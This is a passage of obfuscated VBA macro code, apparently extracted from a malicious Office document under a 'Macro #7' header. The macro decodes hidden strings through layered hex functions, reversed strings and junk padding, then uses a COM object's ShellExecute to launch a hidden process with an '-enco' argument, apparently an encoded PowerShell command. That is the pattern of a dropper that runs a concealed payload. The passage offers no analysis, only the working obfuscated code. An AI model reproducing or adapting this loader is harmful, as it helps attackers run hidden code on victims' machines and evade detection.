NrfZrmKglNqFFS = Mid(LTdTCDkUymrClEdRblFISCmCV, BaYbFSOmQsGwGSIubglzO + 1, 1) + NrfZrmKglNqFFS
BaYbFSOmQsGwGSIubglzO = 0
End If
Next oAtVUgLsQw
End Function
Macro #7: kvynzguvi
»
Attribute VB_Name = "kvynzguvi"
Sub wZGNsCQikgmKkFuJ()
aVTulBCdEkMlPWBIZjXMgKF ("MP" & "XE" & "ZLW" & "neJnHi" & "" & "UmXr")
End Sub
Function aUMJLTlKXiT(obeATpASlylUYXn As String)
Dim gzyelhWwugKaRbGaxHJH As String
gzyelhWwugKaRbGaxHJH = fxwD("35") & fxwD("36") & fxwD("346535") & fxwD("35366434") & fxwD("33")
On Error Resume Next
Dim jXrGABOVkpqPzBTk As String, QLyDuc As Integer, qaJRmiCigkVsSv As String
Dim uxRlwFbhqNlISBUy As Integer
Dim NZRgauYlpGiIzJzIh As String
jXrGABOVkpqPzBTk = fxwD("414243444546") & fxwD("47") & fxwD("48") & fxwD("494a") & fxwD("4b4c4d4e4f5051") & fxwD("5253") & fxwD("5455565758595a303132333435")
qaJRmiCigkVsSv = "ABC" & "DEF" & "" & "GHIJK" & "LMNOPQ" & "RSTUVWXYZ"
uxRlwFbhqNlISBUy = 0
For QLyDuc = 60 To 1 Step -1
uxRlwFbhqNlISBUy = 2 * uxRlwFbhqNlISBUy + Sgn(InStr(1, qaJRmiCigkVsSv, Mid(InID, QLyDuc, 1), vbBinaryCompare))
If QLyDuc Mod 3 = 1 Then
NZRgauYlpGiIzJzIh = Mid(jXrGABOVkpqPzBTk, uxRlwFbhqNlISBUy + 1, 1) + NZRgauYlpGiIzJzIh
uxRlwFbhqNlISBUy = 0
End If
Next QLyDuc
On Error Resume Next
Dim BvQcDQ As String, RKPOqMc As Integer, fSGVsXoUTqRgTyaR As String
Dim cPCPNljLfIDLVFglHnurP As Integer
Dim kdGYd As String
BvQcDQ = fxwD("41424344") & fxwD("45464748494a4b") & fxwD("4c4d4e") & fxwD("4f505152") & fxwD("535455565758595a") & fxwD("30") & fxwD("31323334") & fxwD("35")
fSGVsXoUTqRgTyaR = fxwD("4142") & fxwD("434445464748494a4b") & fxwD("4c4d4e4f505152535455") & fxwD("56575859") & fxwD("5a")
cPCPNljLfIDLVFglHnurP = 0
For RKPOqMc = 47 To 1 Step -1
cPCPNljLfIDLVFglHnurP = 2 * cPCPNljLfIDLVFglHnurP + Sgn(InStr(1, fSGVsXoUTqRgTyaR, Mid(InID, RKPOqMc, 1), vbBinaryCompare))
If RKPOqMc Mod 1 = 1 Then
kdGYd = Mid(BvQcDQ, cPCPNljLfIDLVFglHnurP + 1, 1) + kdGYd
cPCPNljLfIDLVFglHnurP = 0
End If
Next RKPOqMc
zlyIWJDblVBYo
Dim WkHgDRPBcGnhCA As String
WkHgDRPBcGnhCA = "7a6a42" & "7" & "07" & "a4c6179" & "424" & "97" & "8" & "" & "7954"
End Function
Sub EMldNTqVggq(qmvIB)
Dim TSqkfDw As Double
Dim GkTIuP As Double
TSqkfDw = 1758
Dim kOhmHrQkYvurfDoDVw As Boolean
kOhmHrQkYvurfDoDVw = IsNull("")
Dim zJuYMQWHHr As String
zJuYMQWHHr = fxwD("36393631366134653732353136") & fxwD("3534383461") & fxwD("3466346535343738373435333532343436653761343134") & fxwD("65363235323633") & fxwD("373837") & fxwD("323433") & fxwD("3635") & fxwD("3732")
Dim WcYRQGNmsHchyuhmwcvJgmk As Long
WcYRQGNmsHchyuhmwcvJgmk = 349242444
GkTIuP = TSqkfDw / Application.InchesToPoints(1)
Debug.Print GkTIuP
aUMJLTlKXiT (fxwD("675a51") & fxwD("674b6f4365") & fxwD("4b51517075") & fxwD("455451"))
End Sub
Private Sub zlyIWJDblVBYo()
Dim pBalchYCFqvePxD As String
pBalchYCFqvePxD = AHPG(BtcXqx("33" & "363632") & BtcXqx("333" & "5")) & AHPG(BtcXqx("" & "33" & "383334" & "36") & BtcXqx("3333363636333" & "73" & "3323" & "334")) & AHPG(BtcXqx("3336333" & "53" & "332333636333334363533") & BtcXqx("343" & "331")) & AHPG(BtcXqx("333" & "5") & BtcXqx("" & "3338")) & AHPG(BtcXqx("33343" & "33" & "3") & BtcXqx("3336333" & "9333" & "5")) & AHPG(BtcXqx("333" & "933") & BtcXqx("353" & "3323336333" & "9333" & "7")) & AHPG(BtcXqx("3" & "332") & BtcXqx("3336363533363" & "6343334")) & AHPG(BtcXqx("36" & "33333" & "7333" & "5333" & "533") & BtcXqx("39")) & AHPG(BtcXqx("33343" & "3") & BtcXqx("34")) & AHPG(BtcXqx("333636" & "35333" & "7") & BtcXqx("333" & "533343636333" & "53" & "3323334")) & AHPG(BtcXqx("333" & "9333" & "5333033343" & "3") & BtcXqx("" & "383334")) & AHPG(BtcXqx("36" & "33333" & "7") & BtcXqx("333" & "7"))
Dim WVFORdqBkiC As String
WVFORdqBkiC = AHPG(BtcXqx("333533343335333233373338333533393" & "33436343337333" & "93" & "33" & "63336333436") & BtcXqx("323337333" & "5333736313337363133343" & "335333533343336333933" & "363338333633353334333833373333333" & "633363336" & "33333" & "337333233373337333636353335")) & AHPG(BtcXqx("333233343" & "63233363332333733" & "3133343" & "338333" & "633" & "31333" & "5333033363" & "33233373335" & "333733" & "3133343" & "3" & "3133363339333" & "433") & BtcXqx("33333" & "7333" & "" & "63336")) & AHPG(BtcXqx("36" & "33333" & "7333633373" & "333") & BtcXqx("3336363133343" & "33933363" & "33333343333333436343" & "33633353337")) & AHPG(BtcXqx("33" & "31"))
Dim OMRGuyaxzRC As String
OMRGuyaxzRC = NkhSyLXWtKuiGLf("BcuajJbNF" & "z" & "qOT") & hUMQKNWacwJDjots("qjtIHnz" & "IOA" & "" & "TUyqD") & ydxiRcAysBQVHlY("JXWi" & "ads" & "Qtf" & "D") & BtorfXYYMDf("RDUX" & "eJBxrIEk" & "S") & KjlnEzpgIErFaL("IVz" & "FszSFhGY" & "E") & rZKGSmQbSxBaDqDh("wEa" & "vuOhtn" & "c" & "gYHyP") & QznRxNYErOr("rOK" & "aBayKa" & "" & "oAKjen") & gJFokRdWCGw("F" & "RhuYKm" & "Maq" & "cR") & YXMssGSZxljUXefo("AyVq" & "DJpCemOh" & "EYs")
Dim vQapdCCKWAdSNzopWy As String
vQapdCCKWAdSNzopWy = AHPG(BtcXqx("33343338" & "33353631333733323" & "3" & "3633373" & "33" & "636363" & "" & "3363" & "331" & "3335" & "33393" & "33433323" & "33" & "636353" & "" & "33636333337333133343" & "331333733393" & "33" & "6363633") & BtcXqx("363" & "3" & "3633373" & "3" & "36333733313" & "" & "3363" & "332" & "3337363" & "13337333" & "0333433333" & "" & "33636323337" & "3333")) & AHPG(BtcXqx("3" & "336") & BtcXqx("36" & "34")) & AHPG(BtcXqx("333433343" & "3373339333433373" & "336" & "33393" & "" & "3363" & "3") & BtcXqx("333337333833" & "353" & "" & "3363" & "33" & "63635333433343" & "" & "3363" & "331")) & AHPG(BtcXqx("33373335" & "3" & "33" & "6363533353" & "" & "3363" & "334363133353" & "3" & "36333733383335333433") & BtcXqx("343" & "6333" & "33433343337363133" & "343635"))
Dim hAEFAhdtPFp As String
Dim lWOHgNDPemNSpLmaTMej As String
lWOHgNDPemNSpLmaTMej = AHPG(BtcXqx(cIKgjL("333" & "33" & "33" & "633" & "3" & "63" & "336" & "33" & "33" & "33") & cIKgjL(cIKgjL(cIKgjL("333" & "33" & "33" & "5")))) & BtcXqx(cIKgjL("333" & "333" & "333" & "3" & "333" & "33" & "53" & "33" & "33" & "33" & "433" & "333" & "3373" & "3" & "3" & "33" & "33033" & "3" & "33" & "33" & "53" & "33" & "33" & "3323" & "3" & "33") & cIKgjL("333" & "6"))) & AHPG(BtcXqx(cIKgjL("333" & "33" & "3" & "313" & "33" & "33" & "33" & "433") & cIKgjL("363" & "3" _
& "313" & "33" & "33" & "3373" & "3" & "3" & "33" & "3373" & "3" & "3" & "33" & "33" & "633" & "3" & "633" & "32" & "333" & "33" & "33" & "633" & "3" & "33" & "33" & "53" & "33" & "33" & "33" & "633" & "3" & "63" & "336" & "33" & "3" & "33" & "33" & "633" & "3" & "633" & "3" & "333" & "333" & "33" & "53" & "33" & "33" & "" & "33833" & "3" & "33" & "33" & "43" & "33" & "633" & "3" & "333" & "333" & "33" & "43" & "333") & cIKgjL("33373" & "3" & "3" & "33" & "3373" & "3" & "3" & "33" & "332" & "333" _
& "33" & "33" & "633" & "3" & "6")) & BtcXqx(cIKgjL(cIKgjL("333" & "33" & "33" & "5")) & cIKgjL("333" & "33" & "33" & "5"))) & AHPG(BtcXqx(cIKgjL("333" & "33" & "" & "33833" & "3" & "33" & "33" & "53" & "33" & "33" & "33" & "433" & "333" & "3373" & "3" & "3" & "33" & "33" & "53" & "33" & "33" & "33" & "43" & "333" & "33") & cIKgjL("3" & "433" & "3" & "33" & "3373" & "3" & "33")) & BtcXqx(cIKgjL("333" & "9" & "333" & "33" & "33" & "633" & "3" & "633" & "3" & "433" & "333" & "3373" & "3" & "3" _
& "33" & "" & "33833" & "3" & "33" & "3373" & "3" & "33") & cIKgjL("333" & "433" & "333" & "3373" & "3" & "3" & "33" & "33" & "53" & "33" & "33" & "33" & "43" & "33" & "633" & "35"))) & AHPG(BtcXqx(cIKgjL("333" & "33" & "33" & "433") & cIKgjL("363" & "3" & "313" & "33" & "33" & "337")) & BtcXqx(cIKgjL("333" & "33" & "332" & "333" & "33" & "33" & "43" & "33" & "33" & "339" & "333" & "33" & "3373" & "3" & "3" & "33" & "3" & "3133") & cIKgjL("333" & "33" & "633" & "3" & "633" & "313" & "33" & "33" _
& "33" & "53" & "33" & "33" _
& "339")))
Set ZWtzhFHUuQkuvEXw = GetObject(StrReverse(AHPG(BtcXqx(cIKgjL("" & "3337" & "363433" & "3" & "333393" & "33333") & cIKgjL("3" & "3333433363" & "3333338333433313" & "33333303" & "333" & "333" & "9333" & "43" & "3333" & "3333330333433313" & "333")) & BtcXqx(cIKgjL("33303" & "333333033" & "3236343" & "33333323" & "33333343" & "3333334" & "33343331" & "333236") & cIKgjL("343334333633343" & "3333" & "33333313" & "3333331333236343" & "3333338333433313" & "333333633343336333236343" & "33333323" & "333" & "33373" & "33333393" & "3" & "333335" & "3" & "3333330"))) & AHPG(BtcXqx(cIKgjL("333" & "433313334333233" & "3" & "333") & cIKgjL("39")) & BtcXqx(cIKgjL("" & "333736" & "3" & "2") & cIKgjL("3" & "3333631" & "3337" & "33373336333533363" & "635"))))).Item()
Dim SZvMiFGuHHTHNGo As String
SZvMiFGuHHTHNGo = AHPG(BtcXqx("333" & "43" & "6") & BtcXqx("3" & "63335363" & "1" & "333" & "733" & "32" & "3335" & "33353334")) & AHPG(BtcXqx("36" & "35333" & "7" & "3339" & "33" & "36" & "36" & "35333" & "43" & "6343" & "33" & "43" & "6363" & "33" & "73" & "33333" & "36") & BtcXqx("36" & "32" & "333" & "43" & "632" & "33" & "35")) & AHPG(BtcXqx("33" & "3633" & "3633" & "36333" & "43" & "632" & "33") & BtcXqx("" & "34333" & "43" & "3373" & "3303" & "33" & "6" & "36" & "32" & "333" & "7")) & AHPG(BtcXqx("363133" & "36333933" & "36333" & "433" & "36" & "36" & "33333" & "43" & "6363" & "3" & "37333" & "73334") & BtcXqx("36" & "36")) & AHPG(BtcXqx("333" & "4333833" & "36333" & "63335363" & "133" & "36333" & "7333" & "43" & "63333" & "3633393" & "3") & BtcXqx("34")) & AHPG(BtcXqx("333" & "433353" & "331333" & "433") & BtcXqx("3833" & "3" & "43" & "631" & "333" & "733" & "38"))
Dim IRDxoUiXLJZegzkbeA As String
IRDxoUiXLJZegzkbeA = AHPG(BtcXqx(cIKgjL("3" & "" & "33" & "333" & "3" & "733" & "3" & "33" & "33" & "033") & cIKgjL("3" & "33" & "3343" & "3" & "3" & "63" & "3343" & "" & "33" & "333" & "363" & "3" & "36") & cIKgjL("3" & "33" & "33" & "" & "33" & "333" & "343" & "3" & "363" & "3" & "36") & cIKgjL("3" & "" & "33" & "333" & "353" & "" & "33" & "333" & "38" & "3" & "" & "33" & "333" & "34")) & BtcXqx(cIKgjL("3" & "333" & "" & "33313" & "" & "33" & "333") & cIKgjL("34"))) & AHPG(BtcXqx(cIKgjL("3" _
& "33" & "33" & "337" & "3" & "" & "33" & "333" & "343" & "3") & cIKgjL("363" & "3353" & "" & "33" & "333" & "353" & "33" & "33" & "336") & cIKgjL("3" & "" & "33" & "333" & "36" & "33" & "363" & "3313" & "" & "33" & "333" & "373" & "" & "33" & "333" & "31")) & BtcXqx(cIKgjL("3" & "33" & "33" & "337" & "3" & "" & "33" & "333" & "343" & "333") & cIKgjL("33" & "36"))) & AHPG(BtcXqx(cIKgjL("33" & "36") & cIKgjL("3" & "333"))) & AHPG(BtcXqx(cIKgjL("3" & "" & "33" & "333" & "343" & "" & "33" & "3" _
& "33313" & "333") & cIKgjL("33" & "353" & "333")) & BtcXqx(cIKgjL("3" & "3303" & "333") & cIKgjL("33" & "353" & "" & "33" & "333" _
& "37")))
Dim YGpAVAVj As String
YGpAVAVj = AHPG("3432" & "37") & AHPG("333" & "53236373636") & AHPG("" & "3436")
Dim paqKfjUSja As String
paqKfjUSja = AHPG(BtcXqx("3336363" & "333353337" & "3336333833353335333733303336363233") & BtcXqx("373332333433343334363133353336" & "3334")) & AHPG(BtcXqx("36363" & "3") & BtcXqx("363" & "339")) & AHPG(BtcXqx("33343335333733383336333533353336" & "33") & BtcXqx("" & "363336")) & AHPG(BtcXqx("33363632333433333337333733" & "3533353336") & BtcXqx("3337" & "3337333333373631")) & AHPG(BtcXqx("33") & BtcXqx("343335333433" & "363336")) & AHPG(BtcXqx("3634333" & "736313337333533373631") & BtcXqx("3336363133343" & "3393335333833373337"))
Dim IxReEvW As String
Dim lOoSSdjMpOh As String
lOoSSdjMpOh = AHPG(BtcXqx("33343632" & "3335333533343335") & BtcXqx("3337333033353" & "333333633353337333633" & "373330333433353337333233353339")) & AHPG(BtcXqx("33" & "363634333633") & BtcXqx("363335333733343" & "33333343" & "3353336363" & "33337333833343631333433393336")) & AHPG(BtcXqx("" & "3331")) & AHPG(BtcXqx("333" & "436343334") & BtcXqx("3" & "333"))
hAEFAhdtPFp = StrReverse(AHPG(BtcXqx(cIKgjL("3336333" & "533373338333633" & "353332363533363633") & cIKgjL("3336" & "36333336")) & BtcXqx(cIKgjL("33" & "3533") & cIKgjL("" & "363338"))) & AHPG(BtcXqx(cIKgjL("33373333333" & "7") & cIKgjL("33323336333" & "5")) & BtcXqx(cIKgjL("33373" & "3373336363633") & cIKgjL("37" & "3330"))))
Dim SFzmiUVEjaTz As String
SFzmiUVEjaTz = AHPG(BtcXqx(cIKgjL("3" & "" & "3" & "333" & "3" & "373" & "" & "3" & "333" & "" & "" & "33" & "53" & "" & "3" & "333" & "" & "" & "33" & "53" & "" & "3" & "333" & "336" & "3" & "" & "3" & "333" & "" & "3" & "343" & "" & "3" & "333" & "3" & "383" & "" & "3" & "333" & "" & "3" & "343" & "" & "3" & "333" & "" & "3" & "333" & "3" & "" & "3" & "333" & "363" & "" & "3" & "333" & "332" & "3" & "" & "3" & "333" & "3" & "373" & "" & "3" & "333" & "" & "" & "33" & "53" & "" & "3" & "333" _
& "" & "3" & "343336" & "3" & "" & "3" & "333" & "3" & "" & "3" & "333" & "343336" & "3" & "" & "3" & "333" & "3" & "" & "3" & "333" & "353336" & "3331" & "3" & "" & "3" & "333" & "" & "" & "33" & "53336" & "3331" & "3" & "" & "3" & "333" & "" & "" & "33" & "53" & "" & "3" & "333" & "332" & "3" & "" & "3" & "333" & "336" & "3336" & "3331" & "3" & "" & "3" & "333" & "3" & "373" & "" & "3" & "333" & "3" & "" & "3" & "333" & "333" & "33" & "7" & "3" & "333" & "333" & "93" & "" & "3" & "333" & "" _
& "" & "33" & "53" & "" & "3" & "333" & "331" & "3" & "" & "3" & "333" & "3") & cIKgjL("373" & "" & "3" & "333" & "33" & "03" & "" & "3" & "333" & "335" & "3" & "333" & "333" & "03" & "" & "3" & "333" & "3" & "373" & "" & "3" & "333" & "3" & "" & "3" & "333" & "333" & "337")) & BtcXqx(cIKgjL("3" & "" & "3" & "333" & "3" & "383" & "" & "3" & "333" & "336" & "3336" & "333" & "3" & "" & "3" & "333" & "3336" & "3" & "" & "3" & "333" & "3" & "" & "38333" & "3") & cIKgjL("3336" & "3" & "" & "3" & "333" _
& "3" & "373" & "" & "3" & "333" & "33" & "4"))) & AHPG(BtcXqx(cIKgjL("3" & "" & "3" & "333" & "3" & "38") & cIKgjL("3" & "" & "3" & "333" & "" & "3" & "343" & "" & "3" & "333" & "33" & "93" & "" & "3" & "333" & "" & "" & "33" & "53" & "" & "3" & "333" & "339" & "3" & "333")) & BtcXqx(cIKgjL("333" & "7" & "3" & "333" & "33" & "373" & "" & "3" & "333" & "3") & cIKgjL("343" & "" & "3" & "333" & "" & "3" & "333" & "3" & "" & "3" & "333" & "36"))) & AHPG(BtcXqx(cIKgjL("3" & "" & "3" & "333" & "337") _
& cIKgjL("3" & "" & "3" & "333" & "" & "" & "33" & "53" & "" & "3" & "333" & "33" & "03" & "" & "3" & "333" & "337")) & BtcXqx(cIKgjL("33") & cIKgjL("3" & "" & "3" & "3" & "3" & "343" & "3" & "" & "3" & "333" & "36"))) & AHPG(BtcXqx(cIKgjL("3336" & "3" & "" & "33" & "533" & "3" & "" & "3" & "3" & "" & "33" & "53" & "" & "3" & "333" & "332") & cIKgjL("3" & "" & "3" & "333" & "" & "" & "33" & "53" & "" & "3" & "333" & "33" & "7" & "3" & "333")) & BtcXqx(cIKgjL("3" & "3" & "343" & "" & "3" & "333" _
& "332" & "3" & "" & "3" & "333" & "336" & "3336" & "3336" & "3" & "" & "3" & "333" & "" & "3" & "343" & "" & "3" & "333" & "33" & "93" & "" & "3" & "333" & "" & "" & "33" & "533" & "3" & "" & "3" & "3332" & "3" & "" & "3" & "333" & "335") & cIKgjL("3" & "" & "3" & "333" & "33" & "93" & "" & "3" & "333" & "336" & "3" & "" & "3" & "333" & "3" & "373" & "" & "3" & "333" & "336" & "3336" & "3331" & "3" & "" & "3" & "333" & "336" & "3" & "" & "3" & "333" & "" & "3" & "343" & "" & "3" & "333" & "3" _
& "373" & "" & "3" & "333" & "33" & "93" & "" & "3" & "333" & "" & "3" & "343" & "" & "3" & "333" & "" & "3" & "343" & "" & "3" & "333" & "3" & "3733" & "3" _
& "63331")))
IxReEvW = StrReverse("" & " ocne-")
Dim XjrEPsQrMVtI As String
XjrEPsQrMVtI = AHPG(BtcXqx("333636363" & "3353335") & BtcXqx("" & "3337" & "3331333" & "63633")) & AHPG(BtcXqx("333433343334363333343631333533363" & "3") & BtcXqx("363" & "332")) & AHPG(BtcXqx("" & "3337") & BtcXqx("33333335333" & "23336")) & AHPG(BtcXqx("33333334333833363336333533333335333933" & "35333333") & BtcXqx("3" & "63633")) & AHPG(BtcXqx("" & "3" & "3373631") & BtcXqx("33" & "34333333353339")) & AHPG(BtcXqx("333" & "63631333636") & BtcXqx("34"))
Dim QgczFfpFQEASfngR As String
QgczFfpFQEASfngR = AHPG(BtcXqx(cIKgjL("33" & "333" & "3363" & "333" & "33") & cIKgjL("3" & "133" & "3" & "333") & cIKgjL("343" & "336" & "33" & "343" & "33" & "3") & cIKgjL("3" & "" & "33" & "633" & "333" & "3363" & "333" & "3335" & "33" & "33" & "3" & "333" & "33" & "3" & "333" & "35")) & BtcXqx(cIKgjL("33" & "3" & "333") & cIKgjL("343" & "33" & "3") & cIKgjL("333" & "733" & "33" & "3" & "333" & "3" & "333" & "3" & "3363" & "333" & "3" & "" & "33" & "633" & "3" & "333") & cIKgjL("343" & "336" _
& "3" & "33433" & "3" & "333" & "373" & "" & "33" & "6333" & "133" & "3" & "333" & "35"))) & AHPG(BtcXqx(cIKgjL("3" & "" & "33" & "6333" & "133" & "333" & "" & "33" & "633") & cIKgjL("3" & "333" & "3733" & "3" & "333") & cIKgjL("343" & "" & "33" & "633" & "31")) & BtcXqx(cIKgjL("33" & "3" & "333" & "353" & "333") & cIKgjL("3" & "336"))) & AHPG(BtcXqx(cIKgjL("33" & "3" & "333") & cIKgjL("34"))) & AHPG(BtcXqx(cIKgjL("33" & "3" & "333" & "3" & "133" & "3" & "333") & cIKgjL("343" & "" & "33" _
& "63334")) & BtcXqx(cIKgjL("33" & "333" & "3363" & "333" & "33") _
& cIKgjL("31")))
ZWtzhFHUuQkuvEXw.Document.Application.ShellExecute hAEFAhdtPFp, IxReEvW & OMRGuyaxzRC, StrReverse(AHPG(BtcXqx("3332333336643635373437" & "3337") & BtcXqx("3935333563373337373666363436" & "65363935373563")) & AHPG(BtcXqx("" & "336134") & BtcXqx("33"))), Null, 0 * 1
Dim lEvigNZowvCAaq As String
lEvigNZowvCAaq = AHPG(BtcXqx(cIKgjL("3" & "3" & "333" & "3" & "373" & "33" & "63" & "33" & "13" & "3" & "333" & "3" & "3" & "733") & cIKgjL("3" & "3" & "333" & "43" & "3" & "333" & "3" & "353" & "3" & "333" & "3303" & "333" & "3" & "33" & "63" & "333")) & BtcXqx(cIKgjL("33" & "38"))) & AHPG(BtcXqx(cIKgjL("3" & "3" & "333" & "3" & "373" & "3" & "333" & "3" & "323" & "3" & "333" & "33" & "63" & "3" & "3" & "333" & "353" & "3" & "3" & "333" & "34") & cIKgjL("3" & "3" & "333" & "3" & "323" _
& "333")) & BtcXqx(cIKgjL("3" & "33" & "63" & "3") & cIKgjL("3" & "3" & "" & "3332" & "3" & "333" & "3" & "3373" & "3" & "333" & "3303" & "3" & "333" & "3" & "373" & "3" & "3" & "333" & "34"))) & AHPG(BtcXqx(cIKgjL("3" & "3" & "3" & "333" & "343" & "33" & "63" & "33" & "13" & "3" & "3" & "333" & "343" & "3" & "333" & "33" & "63" & "3" & "3" & "333" & "353" & "3" & "333" & "3" & "353" & "3" & "333" & "336") & cIKgjL("3" & "333")) & BtcXqx(cIKgjL("3" & "33" & "63" & "3" & "3" & "333" & "353" & "3" _
& "333" & "33" & "13" & "3" & "333" & "33" & "63" & "33" & "63" & "3" & "333" & "3" & "3" & "333" & "343" & "3" & "333" & "3" & "333" & "3" & "333" & "3") & cIKgjL("37"))) & AHPG(BtcXqx(cIKgjL("3" & "3" & "333" & "3" & "383" & "3" & "333" & "3") & cIKgjL("373" & "3" & "333" & "3393" & "3" & "3" & "333" & "343" & "336")) & BtcXqx(cIKgjL("3" & "333"))) & AHPG(BtcXqx(cIKgjL("3" & "3" & "333" & "3" & "3" & "733") & cIKgjL("3" & "3" & "" & "3332" & "3" & "3" & "333" & "33" & "63" & "33" & "6333" & "43" _
& "3" & "333" & "3" & "353" & "3" & "333" & "3" & "333" & "333")) & BtcXqx(cIKgjL("33" & "353" & "3" & "333" & "3" & "323" & "3" & "3" & "333" & "343" & "33" & "63" & "332" & "3" & "3" & "3" & "333" & "343" & "3" & "333" & "3" & "333" & "3") & cIKgjL("3" & "3" & "33" & "34"))) & AHPG(BtcXqx(cIKgjL("3" & "336") & cIKgjL("" & "3332" & "3" & "3" & "333" & "33" & "63" & "333")) & BtcXqx(cIKgjL("33" _
& "35")))
Dim YyfYQkXqChXqOHm As String
YyfYQkXqChXqOHm = AHPG(BtcXqx(cIKgjL("33" & "333" & "334" & "333" & "633") & cIKgjL("33" & "333" & "3" & "333" & "733" & "333" & "334" & "3" & "3" & "33")) & BtcXqx(cIKgjL(cIKgjL("33" & "33")) & cIKgjL("35" & "33" & "333" & "336"))) & AHPG(BtcXqx(cIKgjL("33" & "33")) & BtcXqx(cIKgjL("" & "3337" & "33" & "333" & "3" & "333" & "3" & "333" & "334" & "333" & "633") & cIKgjL("32"))) & AHPG(BtcXqx(cIKgjL("33" & "33")) & BtcXqx(cIKgjL("333" & "63" & "336333" & "633" & "33") & cIKgjL("3" & "334"))) & AHPG(BtcXqx(cIKgjL("33" & "333" & "3" & "333" & "3" & "333" & "3") & cIKgjL("3" & "733" & "333" & "3" & "333" & "3" & "333" & "337")) & BtcXqx(cIKgjL("33" & "33") & cIKgjL("333" & "933" & "333" & "334" & "333" & "63" & "334")))
End Sub
Sub VZAVBcAvbekOrbNwFs(NOzQzxYiEtMFJtSTMMitdPd)
Dim WcTvKb As Double
Dim KGcfWOBIs As String
KGcfWOBIs = fxwD("36") & fxwD("3335393632353135") & fxwD("61353334") & fxwD("373638") & fxwD("3634") & fxwD("343436") & fxwD("3436") & fxwD("3337373466") & fxwD("3435")
Dim LVtjXGjMWfxGawR As String
LVtjXGjMWfxGawR = fxwD("3731366634653561353036") & fxwD("3734") & fxwD("6234") & fxwD("353665") & fxwD("35313639") & fxwD("373837") & fxwD("353431") & fxwD("3665")
Dim AeajwLHQudokrnzqU As Boolean
AeajwLHQudokrnzqU = False
Dim KnZxFO As Double
WcTvKb = 11
Dim msUwAZnc As String
msUwAZnc = fxwD("34363466346436") & fxwD("333436346235333734343935613533") & fxwD("36") & fxwD("383736366437") & fxwD("36353836313735") & fxwD("3661363637383434") & fxwD("34633637") & fxwD("373734") & fxwD("32") & fxwD("343935") & fxwD("38353234") & fxwD("65343535") & fxwD("33353237613666") & fxwD("34") & fxwD("39353036623664353136663439363236343561") & fxwD("34653734")
Dim dOILZXhIEFgBjAJeT As String
dOILZXhIEFgBjAJeT = fxwD("3534353337") & fxwD("363665373836653535346436") & fxwD("353635") & fxwD("3461") & fxwD("353934") & fxwD("633436343735") & fxwD(fxwD("3336")) & fxwD(fxwD("3336")) & fxwD("653631373637") & fxwD("30") & fxwD("34373533366636") & fxwD("6134323735") & fxwD("37383634353736") & fxwD("3336") & fxwD("653538") & fxwD("363534") & fxwD("39353935") & fxwD("373461") & fxwD("3432353835") & fxwD("37363236383735373136") & fxwD("653438") & fxwD("3634")
KnZxFO = Application.InchesToPoints(WcTvKb)
Debug.Print KnZxFO
EMldNTqVggq (fxwD("576f535a495a6259") & fxwD("47") & fxwD("4d4346") & fxwD("63636e6e476e437776") & fxwD("63") & fxwD("674642"))
End Sub
Sub MpnvQUWNsZXuKH(MszKfASMcBienL)
Dim hVnsAaq As Double
Dim kDAQNetgl As String
kDAQNetgl = fxwD("3531343736") & fxwD("37") & fxwD("343934") & fxwD("35366237363461") & fxwD("366435323666343936663639373334333434343234393663363735383738343535353730") & fxwD("36343535") & fxwD("34") & fxwD("633433356136653539") & fxwD("3730") & fxwD("3434343634623637") & fxwD("363934") & fxwD("653635")
Dim rKBmSHJehOssVGcSkFeeugv As Long
rKBmSHJehOssVGcSkFeeugv = 840789179
Dim SFspDpdOWNHVQRgqSWHNtcLE As Long
SFspDpdOWNHVQRgqSWHNtcLE = 904619455
Dim vvZPDD As Double
hVnsAaq = 17
Dim FoTExOIp As Long
FoTExOIp = 7743744
Dim TPSQoejooKJkMHf As Long
TPSQoejooKJkMHf = 363827613
vvZPDD = Application.InchesToPoints(hVnsAaq)
Debug.Print vvZPDD
VZAVBcAvbekOrbNwFs (fxwD("615364") & fxwD("59586e") & fxwD("5a61") & fxwD("555145614466764e") & fxwD("42"))
End Sub
Sub vRDgT(BsMMEpIxLnXcFVs)
Dim bnAAfcSZ
Dim wYZPDglESnjmwfabkfvV As Boolean
wYZPDglESnjmwfabkfvV = IsNull("")
Dim SwnWOVcxJxzhw As Integer
SwnWOVcxJxzhw = 21155
Dim pnMlBknTUzh As String
pnMlBknTUzh = fxwD("37323631346634") & fxwD("6335323636") & fxwD("353236") & fxwD("6135") & fxwD("303561343236") & fxwD("61") & fxwD("3639") & fxwD("343335") & fxwD("353761") & fxwD("36") & fxwD("61") & fxwD("373034613432") & fxwD("366237313438373337") & fxwD("37")
bnAAfcSZ = 0
Dim hYVsOAw
Dim knKtiKqQb As Long
knKtiKqQb = 461615279
Dim DBtbTpvXTjLYeIOYBBrYdrUSz As Boolean
DBtbTpvXTjLYeIOYBBrYdrUSz = True
MpnvQUWNsZXuKH (fxwD("4e72") & fxwD("4767") & fxwD("4f57777566786751") & fxwD("46") & fxwD("45") & fxwD("797755") & fxwD("4149"))
hYVsOAw = Timer
Do While Timer - hYVsOAw < bnAAfcSZ
Loop
End Sub
Function AHPG(wCbTpVrwnFiB As Variant) As Variant
Dim xWxPpl As String
xWxPpl = "55676844645879734d69705" & "74a4" & "662" & "4978" & "5342454f73" & "644e5476" & "784c7952" & "74" & "69456" & "e64685" & "4" & "4" & "7744" & "" & "e5747"
Dim YoypIrnPfjMW As Long
Dim uYrLfOS As String
uYrLfOS = "6470476d524b" & "53754c476a68644e4c7279416e6564504c6" & "" & "8656" & "7" & "4a5" & "36e47" & "6b7545"
Dim xEJNmyXgHcsD As Variant
Dim LcUlwXJIxZofOAL As String
LcUlwXJIxZofOAL = fxwD("36663636") & fxwD("3635373234") & fxwD("353439") & fxwD("353334383462") & fxwD("34") & fxwD("6635") & fxwD("383635") & fxwD("363337") & fxwD("37") & fxwD("3633") & fxwD("35613535343136") & fxwD("31") & fxwD("34393463") & fxwD("3532") & fxwD("3439353334") & fxwD("64") & fxwD("3664353837") & fxwD("373637") & fxwD("3663") & fxwD("343336") & fxwD("37") & fxwD("3661346236") & fxwD("32343735") & fxwD("343638")
Dim CHRXvsDGkSZD As String
Dim eBuQdFksWx As String
eBuQdFksWx = fxwD("3536343434333431343837303730") & fxwD("366637343531346435363738") & fxwD("36333666") & fxwD("353237") & fxwD("38343834373662366636663439366437") & fxwD("303532353936333438") & fxwD("373435323730343537323633363237") & fxwD("30366637") & fxwD("39") & fxwD("343736") & fxwD("323435353535") & fxwD("323536353136") & fxwD("38")
For YoypIrnPfjMW = 1 To Len(wCbTpVrwnFiB) Step 2
Dim CKwCVTDE As String
